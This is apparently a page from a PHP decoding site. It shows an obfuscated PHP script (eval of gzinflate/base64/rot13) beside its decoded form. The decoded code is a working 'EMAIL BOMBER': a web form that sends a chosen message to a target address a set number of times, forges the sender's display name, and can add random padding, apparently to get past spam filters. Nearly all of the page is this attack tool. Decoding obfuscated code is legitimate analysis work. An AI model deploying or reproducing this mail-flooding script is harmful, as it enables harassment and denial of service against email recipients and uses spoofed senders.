Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzinflate(base64_decode(strrev(str_rot13('==jSkm93x3+exhvVPiR/chhnrCbvIkgBmg08..

Decoded Output download

$dis=$_GET['display'];
if(
            isset($_GET['to']) &&
            isset($_GET['subject']) &&
            isset($_GET['message']) &&
            isset($_GET['times']) &&
            $_GET['to'] != '' &&
            $_GET['subject'] != '' &&
            $_GET['message'] != '' &&
            $_GET['times'] != ''
        )
        {
            $times = $_GET['times'];
            while($times--)
            {
                if(isset($_GET['padding']))
                {
                    $fromPadd = rand(0,9999);
                    $subjectPadd = "".rand(0,9999999);
                    $messagePadd = "".rand(0,99999999);
                    
                }
                $from = "$dis$fromPadd";
                if(!mail($_GET['to'],$_GET['subject'].$subjectPadd,$_GET['message'].$messagePadd,"From:".$from))
                {
                    $error = 1;
                    echo "<center><font color=red size=3><blink><blink>Some Error Occured!</blink></font></center>";
                    break;
                }
            }
            if($error != 1)
            {
                echo "<center><font color=lime size=3><blink>Mail(s) Sent!</blink></font></center>";
            }
        }

Did this file decode correctly?

Original Code

<?php
eval(gzinflate(base64_decode(strrev(str_rot13('==jSkm93x3+exhvVPiR/chhnrCbvIkgBmg088wmXyuwj9gIGXqsKPlEulq5Wiz1ANxIJWnlowW3Nv6LsIzSMTtIe3rCsFwcKK8T8iOAERam9MfHRtjYfKJV8SDrR5WdZnUvy+C/jUyumTZ/6EKiGe19wNi3JCZeGY0mhOAeGG0mhokc2bgNBIwurqwJmJQ84cl6iy305wgfm6BRMUvGlElW0GeWnH4MzcgipYsLsAn+kDvaiTPyKYwwFM21IfcGfwoD+zvmtfUhXvkHypI7BHJeB0qPzcHnh0ejhF9qvPwdd/8xdNezLlECymzMgF5foHQDZTrP2VoaTOlrROu1FOPYEtHTu4vXt8UPkzxuZxgSJZKElZuPPHuy0wtczwfYJYQ+0hmQQs/yY/87eSlxr4hUa5+AZmLGqCjDc48lr/iEnzlNmtES64P/0n4Bkne2haOaSennfRRVREdb/3KVSNW4oYWMw')))));
?>
<body bgcolor="black">
  <div style="color:white;font-size:50px;" align="center">EMAIL<img src="http://s8.postimage.org/nm4utglzl/bomb.png" />BOMBER</div>
  <br />
            <form method="GET">
                <input type="hidden" name="bomb" />
                <input type="hidden" name="mailbomb" />
                <table id="margins" style="width:100%;">
                    <tr>
                        <td style="width:30%;color:white;">
                            To
                        </td>
                        <td>
                            <input name="to" value="[email protected]" />
                        </td>
                    </tr>
     <tr>
                    <td style="width:30%;color:white;">
        Display name:
      </td>
          <td>  
            <input name="display" value="Display name here">
       </td>  
                    <tr>
                        <td style="width:30%;color:white">
                            Subject
                        </td>
                        <td>
                            <input type="text"  name="subject" value="Prototype here!"/>
                        </td>
                    </tr>
                     <tr>
                        <td style="width:30%;color:white;">
                            how many times  
                        </td>
                        <td>
                            <input  name="times" value="100" />
                        </td>
                    </tr>
          
                    <tr>
                        <td style="width:30%;color:white;">
                            
                            for less spam
                            
                        </td>
                        <td>
                        
                            <input type="checkbox" name="padding"/>
                              
                        </td>
                    </tr>
                    <br />
     <tr>
                        <td colspan="2">
                            <textarea name="message" cols="90" rows="10" class="box">YOUR MESSAGE HERE!!!!
       ~PROTOTYPE
       </textarea>
                        </td>
                    </tr>
                    
                    
                    <tr>
                        <td rowspan="2">
                            <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="    Bomb!  "/>
                        </td>
                    </tr>
                </table>            
            </form>  
         </body>

Function Calls

strrev 1
gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 4e968001fd34792b4e3f9037e1fa3d20
Eval Count 1
Decode Time 54 ms